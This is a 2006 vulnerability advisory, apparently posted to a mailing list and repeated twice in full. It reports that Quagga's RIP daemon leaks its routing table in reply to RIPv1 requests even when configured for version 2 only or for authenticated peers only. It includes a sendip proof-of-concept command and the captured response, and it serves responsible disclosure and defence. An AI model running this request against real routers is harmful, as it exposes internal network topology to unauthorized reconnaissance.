Konstantin V. Gavrilenko
03/05/06, 18:00
Arhont Ltd - Information Security
Advisory by: Konstantin V. Gavrilenko (http://www.arhont.com)
Arhont ref: arh200604-1
Advisory: Quagga RIPD unauthenticated route table broadcast
Class: design bug?
Version: Tested on Quagga suite v0.98.5 v0.99.3(Gentoo, 2.6.15)
Model Specific: Other versions might have the same bug
DETAILS
Quagga would respond to RIP v1 request for SEND UPDATE and send out the
routing table updates, even if it has been configured to work with
version 2 of the protocol only, using the following settings in the
config file:
interface eth0
ip rip send version 2
ip rip receive version 2
!
router rip
version 2
Sending a request for update:
arhontus / # sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p
rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
Catching response on the attacker host:
arhontus / # tcpdump -n -i eth0 port 520
22:10:02.532103 IP 192.168.66.102.520 > 192.168.66.111.520: RIPv1,
Request, length: 24
22:10:02.532474 IP 192.168.66.111.520 > 192.168.66.102.520: RIPv1,
Response, length: 64
Tethereal extract from the response RIP packet:
Routing Information Protocol
Command: Response (2)
Version: RIPv1 (1)
IP Address: 0.0.0.0, Metric: 1
Address Family: IP (2)
IP Address: 0.0.0.0 (0.0.0.0)
Metric: 1
IP Address: 192.168.50.24, Metric: 1
Address Family: IP (2)
IP Address: 192.168.50.24 (192.168.50.24)
Metric: 1
IP Address: 192.168.77.0, Metric: 1
Address Family: IP (2)
IP Address: 192.168.77.0 (192.168.77.0)
Metric: 1
The same situation is observed if Quagga has been configured to accept
packets with plaintext or md5 authentication only, using the following
options in the configuration:
interface eth0
ip rip authentication mode md5 auth-length old-ripd
ip rip authentication key-chain dmz_auth
The response packet contains the same information as in previous example.
This vulnerability can be exploited to extract the routing table
information from the router otherwise inaccessible due to strict control
of the multicast packets spread on the switch ports, or extremely large
interval set between updates.
RISK FACTOR: Low
WORKAROUNDS: Firewall the access to the ripd daemon on the need to
access basis.
COMMUNICATION HISTORY:
Issue discovered: 10/04/2006
Quagga notified: 24/04/2006
Public disclosure: 03/05/2006
ADDITIONAL INFORMATION:
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do
not hesitate to contact Arhont team on info@arhont.com
--
Respectfully,
Konstantin V. Gavrilenko
Managing Director
Arhont Ltd - Information Security
web: http://www.arhont.com
http://www.wi-foo.com
e-mail: k.gavrilenko@arhont.com
tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141
PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com
Advisory by: Konstantin V. Gavrilenko (http://www.arhont.com)
Arhont ref: arh200604-1
Advisory: Quagga RIPD unauthenticated route table broadcast
Class: design bug?
Version: Tested on Quagga suite v0.98.5 v0.99.3(Gentoo, 2.6.15)
Model Specific: Other versions might have the same bug
DETAILS
Quagga would respond to RIP v1 request for SEND UPDATE and send out the
routing table updates, even if it has been configured to work with
version 2 of the protocol only, using the following settings in the
config file:
interface eth0
ip rip send version 2
ip rip receive version 2
!
router rip
version 2
Sending a request for update:
arhontus / # sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p
rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
Catching response on the attacker host:
arhontus / # tcpdump -n -i eth0 port 520
22:10:02.532103 IP 192.168.66.102.520 > 192.168.66.111.520: RIPv1,
Request, length: 24
22:10:02.532474 IP 192.168.66.111.520 > 192.168.66.102.520: RIPv1,
Response, length: 64
Tethereal extract from the response RIP packet:
Routing Information Protocol
Command: Response (2)
Version: RIPv1 (1)
IP Address: 0.0.0.0, Metric: 1
Address Family: IP (2)
IP Address: 0.0.0.0 (0.0.0.0)
Metric: 1
IP Address: 192.168.50.24, Metric: 1
Address Family: IP (2)
IP Address: 192.168.50.24 (192.168.50.24)
Metric: 1
IP Address: 192.168.77.0, Metric: 1
Address Family: IP (2)
IP Address: 192.168.77.0 (192.168.77.0)
Metric: 1
The same situation is observed if Quagga has been configured to accept
packets with plaintext or md5 authentication only, using the following
options in the configuration:
interface eth0
ip rip authentication mode md5 auth-length old-ripd
ip rip authentication key-chain dmz_auth
The response packet contains the same information as in previous example.
This vulnerability can be exploited to extract the routing table
information from the router otherwise inaccessible due to strict control
of the multicast packets spread on the switch ports, or extremely large
interval set between updates.
RISK FACTOR: Low
WORKAROUNDS: Firewall the access to the ripd daemon on the need to
access basis.
COMMUNICATION HISTORY:
Issue discovered: 10/04/2006
Quagga notified: 24/04/2006
Public disclosure: 03/05/2006
ADDITIONAL INFORMATION:
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do
not hesitate to contact Arhont team on info@arhont.com
--
Respectfully,
Konstantin V. Gavrilenko
Managing Director
Arhont Ltd - Information Security
web: http://www.arhont.com
http://www.wi-foo.com
e-mail: k.gavrilenko@arhont.com
tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141
PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com